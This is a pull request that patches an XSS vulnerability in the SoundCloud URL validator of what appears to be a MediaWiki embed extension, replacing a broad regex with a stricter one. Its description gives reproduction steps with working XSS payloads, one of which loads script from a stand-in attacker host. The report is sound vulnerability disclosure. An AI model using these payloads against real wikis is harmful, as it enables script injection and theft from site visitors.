### PR TITLE
fixed XSS: broad regex in validator

### DIFF
--- a/includes/EmbedService/SoundCloud.php
+++ b/includes/EmbedService/SoundCloud.php
@@ -46,7 +46,7 @@ final class SoundCloud extends AbstractEmbedService {
 	 */
 	protected function getUrlRegex(): array {
 		return [
-			'#^(https://soundcloud\.com/.+?/.+?)$#is',
+			'#^(https://soundcloud\.com/[\w\-\.]+[/]+[\w\-\.]+/?)$#is',
 		];
 	}
 


### PR DESCRIPTION
Hi! I'd like to report an XSS vulnerability in the extension.
XSS is related to a very broad regex used for validation of SoundCloud URL, which allows to insert sequences of any length containing arbitrary characters (`EmbedVideo/includes/EmbedService/SoundCloud.php`, line 47)
```
protected function getUrlRegex(): array {
	return [
		'#^(https://soundcloud\.com/.+?/.+?)$#is',
	];
}
```
**Steps to reproduce:**
1. Open any page for editing
2. Insert `{{#ev:soundcloud|https://soundcloud.com/foo/bar'><script>alert('XSS');</script>}}` to the page content
3. Enjoy the alert

**A more dangerous example from the real world:**
`{{#ev:soundcloud|https://soundcloud.com/foo/bar'><script src='https://bad-website.com/a-lot-of-code.js'></script>}}`

**How to fix this (my suggestion)**
Avoid using super-broad character classes in regex validator. Change the above fragment to:

```
protected function getUrlRegex(): array {
	return [
		'#^(https://soundcloud\.com/[\w\-\.]+[/]+[\w\-\.]+/?)$#is',
	];
}
```